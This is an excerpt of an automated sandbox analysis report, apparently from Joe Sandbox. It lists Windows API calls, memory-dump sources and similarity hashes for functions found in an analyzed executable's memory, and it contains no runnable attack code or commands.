• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __swprintf_wcscpy$__i64tow__itow
• String ID: %.15g$0x%p$False$True
• API String ID: 3038501623-2263619337
• Opcode ID: 590827ce7b77b8aad8d77ae30f890fa54b52bbd446dfbd0357f9fd69017812b4
• Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
• Opcode Fuzzy Hash: 590827ce7b77b8aad8d77ae30f890fa54b52bbd446dfbd0357f9fd69017812b4
• Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
• __swprintf.LIBCMT ref: 0045E5F6
• _wprintf.LIBCMT ref: 0045E6A3
• _wprintf.LIBCMT ref: 0045E6C7
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-8599901
• Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
• Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
• Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
• Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
APIs
• timeGetTime.WINMM ref: 00443B67
  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
• Sleep.KERNEL32(0000000A), ref: 00443B9F
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(00000000), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
• Sleep.KERNEL32(000000FA), ref: 00443C2D
• IsWindow.USER32(00000000), ref: 00443C3A
• EndDialog.USER32(00000000,00000000), ref: 00443C4C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
• String ID: BUTTON
• API String ID: 1834419854-3405671355
• Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
• Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
• Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
• Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
• LoadStringW.USER32(00000000), ref: 00454040
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• _wprintf.LIBCMT ref: 00454074
• __swprintf.LIBCMT ref: 004540A3
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 455036304-4153970271
• Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
• Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
• Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
• Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
APIs
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
• SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
• SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
• _memmove.LIBCMT ref: 00467EB8
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
• _memmove.LIBCMT ref: 00467F6C
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
• SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
• String ID:
• API String ID: 2170234536-0
• Opcode ID: 4c3f0b1365acc363140b046ec90304d59d81b8d313fde973431f466ecda86ae7
• Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
• Opcode Fuzzy Hash: 4c3f0b1365acc363140b046ec90304d59d81b8d313fde973431f466ecda86ae7
• Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3218148540-0
                                                                                                                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 136442275-0
                                                                                                                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                    • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
• String ID: X
• API String ID: 3104067586-3081909835
• Opcode ID: d09cecb5deb6dd269b96d67ce1f01894bbd120e4dffd6c7162a2683d020f39ff
• Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
• Opcode Fuzzy Hash: d09cecb5deb6dd269b96d67ce1f01894bbd120e4dffd6c7162a2683d020f39ff
• Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
APIs
• OleInitialize.OLE32(00000000), ref: 0046CBC7
• CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
• CLSIDFromString.OLE32(?,?), ref: 0046CBF1
• CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
• _wcslen.LIBCMT ref: 0046CDB0
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
• CoTaskMemFree.OLE32(?), ref: 0046CE42
• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
Strings
• NULL Pointer assignment, xrefs: 0046CEA6
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
• String ID: NULL Pointer assignment
• API String ID: 440038798-2785691316
• Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
• Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
• Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
• Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00461056
• GetWindowTextW.USER32(?,?,00000400), ref: 00461092
• _wcslen.LIBCMT ref: 004610A3
• CharUpperBuffW.USER32(?,00000000), ref: 004610B1
• GetClassNameW.USER32(?,?,00000400), ref: 00461124
• GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
• GetClassNameW.USER32(?,?,00000400), ref: 004611A1
• GetClassNameW.USER32(?,?,00000400), ref: 004611D9
• GetWindowRect.USER32(?,?), ref: 00461248
  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
• String ID: ThumbnailClass
• API String ID: 4136854206-1241985126
• Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
• Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
• SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
• GetClientRect.USER32(?,?), ref: 00471A1A
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
• DestroyIcon.USER32(?), ref: 00471AF4
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
